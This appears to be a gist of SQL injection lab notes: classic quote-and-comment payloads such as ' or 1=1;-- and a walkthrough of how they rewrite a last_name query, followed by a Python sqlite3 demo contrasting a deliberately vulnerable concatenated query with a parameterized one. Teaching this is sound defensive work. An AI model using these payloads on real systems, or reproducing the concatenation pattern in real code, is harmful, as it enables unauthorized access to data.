Last active
November 6, 2019 11:54
<input name="password" type="password" size="10" maxlength="8">
# String SQL injection for stage 1
' or 'a'='a';--
' or 1=1;--
abc' or 1=1;--
Select field1, field2 from table where username="" and password ='abc' or 1=1;--
Solution:
As we can see from the above picture, the SQL statement is
SELECT * FROM user_data WHERE last_name = 'Your Name'
Instead, we can use a comment mark to ignore the ending single quote.
Attacking Input: Smith' or 1=1; -- ("--" is the comment mark; anything that follows it will be ignored)
Smith' or '1'='1'; --
Then the SQL statement will become:
SELECT * FROM user_data WHERE last_name = 'Smith' or 1=1; --'
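
The same lookup built two ways, string concatenation beside a bound parameter, run against the inputs listed above. This is an added example, not part of the original gist; it assumes Python's built-in sqlite3 module, and the table rows and every column other than last_name are constructed.

```python
import sqlite3

# Inputs taken from the page: one normal name and the two quote-and-comment variants.
INPUTS = ["Smith", "Smith' or 1=1; --", "Smith' or '1'='1'; --"]


def make_db():
    """In-memory user_data table; rows and extra columns are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_data (userid INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO user_data VALUES (?, ?, ?)",
        [(101, "Joe", "Snow"), (102, "John", "Smith"), (103, "Jane", "Plane")],
    )
    return conn


def lookup_concatenated(conn, last_name):
    # Vulnerable form: the input becomes part of the SQL text, so a quote in it
    # closes the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, last_name):
    # Hardened form: the SQL text is fixed and the input is bound as a value,
    # so quotes and "--" are compared literally against last_name.
    sql = "SELECT * FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


def compare():
    """Return {input: (rows from concatenated query, rows from parameterized query)}."""
    conn = make_db()
    return {
        value: (len(lookup_concatenated(conn, value)),
                len(lookup_parameterized(conn, value)))
        for value in INPUTS
    }


if __name__ == "__main__":
    for value, (weak, safe) in compare().items():
        print(f"{value!r}: concatenated={weak} rows, parameterized={safe} rows")
```

With the bound parameter, the quote-and-comment inputs match no row because no last_name equals that literal string, while the concatenated query returns the whole table.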